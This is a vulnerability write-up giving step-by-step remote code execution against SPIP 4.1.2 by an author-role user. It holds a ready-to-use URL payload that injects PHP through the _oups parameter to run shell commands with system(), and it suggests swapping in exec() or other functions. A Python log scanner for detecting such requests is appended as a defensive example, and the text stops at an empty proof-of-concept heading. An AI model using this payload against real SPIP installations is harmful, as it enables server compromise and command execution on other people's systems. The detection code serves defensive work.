# Remote Code Execution on SPIP 4.1.2
#### By Abyss Watcher & SpawnZii
## Local environment
- SPIP 4.1.2 (20/05/2022): https://files.spip.net/spip/archives/spip-v4.1.2.zip
- PHP 8.0.0
- MySQL 5.6

Parano mode enabled, default configuration.
## Requirements
- A user account with author role.
- An article to edit.
## Vulnerable code
https://github.com/spip/SPIP/blob/master/prive/formulaires/editer_liens.php#L133 : `_oups` GET parameter, on `edit_article` pages.
## Exploitation
- Log in at **`http://your_host/spip.php?page=login`**.
- If you have not created an article yet, create one at **`http://your_host/ecrire/?exec=article_edit&new=oui`**. Note your article id.
- In the following URL, replace the value of the **id_article** parameter with the id of the article you just created:
**`http://your_host/ecrire/?exec=article&id_article=ID_OF_YOUR_ARTICLE&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG9DIjt9'"><?php system('id;hostname;whoami');?>`**
- Note: you can also replace the PHP function with another one, such as `phpinfo()`, `exec()`, ...
- Hit enter: the result of the command appears in the response.
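
A detection check for the request described above, as an added example that is not part of the original write-up: it scans web server access logs for `_oups` values that are not clean base64. It assumes combined-log-format lines and that a legitimate `_oups` value is plain base64 (like the leading part of the value in the URL above); the function names and the sample log lines are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Request target inside a combined-log-format line; greedy so raw spaces survive.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.*) HTTP/[0-9.]+"')
BASE64_RE = re.compile(r'[A-Za-z0-9+/]*={0,2}')

def oups_values(log_line):
    """Return the URL-decoded value of every `_oups` query parameter."""
    match = REQUEST_RE.search(log_line)
    if not match or "?" not in match.group(1):
        return []
    query = match.group(1).split("?", 1)[1]
    values = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote(name) == "_oups":
            values.append(unquote(raw))  # not unquote_plus: '+' is a base64 char
    return values

def is_suspicious(value):
    """True when the value is not clean base64 (assumed legitimate shape)."""
    if not BASE64_RE.fullmatch(value):
        return True
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return True
    return False

def scan(log_lines):
    """Return (line_number, value) for each suspicious `_oups` value."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        hits.extend((number, v) for v in oups_values(line) if is_suspicious(v))
    return hits

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2022:10:00:00 +0000] "GET /ecrire/?exec=article&id_article=3 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jun/2022:10:00:05 +0000] "GET /ecrire/?exec=article&id_article=3&_oups=YTowOnt9 HTTP/1.1" 200 5130',
    '192.0.2.44 - - [01/Jun/2022:10:02:11 +0000] "GET /ecrire/?exec=article&id_article=3&_oups=YTowOnt9%27%22%3E%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious _oups value: {value!r}")
```

The same test (reject any `_oups` value that is not strict base64) can be applied at a reverse proxy or WAF in front of `/ecrire/` until the installation is upgraded.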
## Proof Of Concept
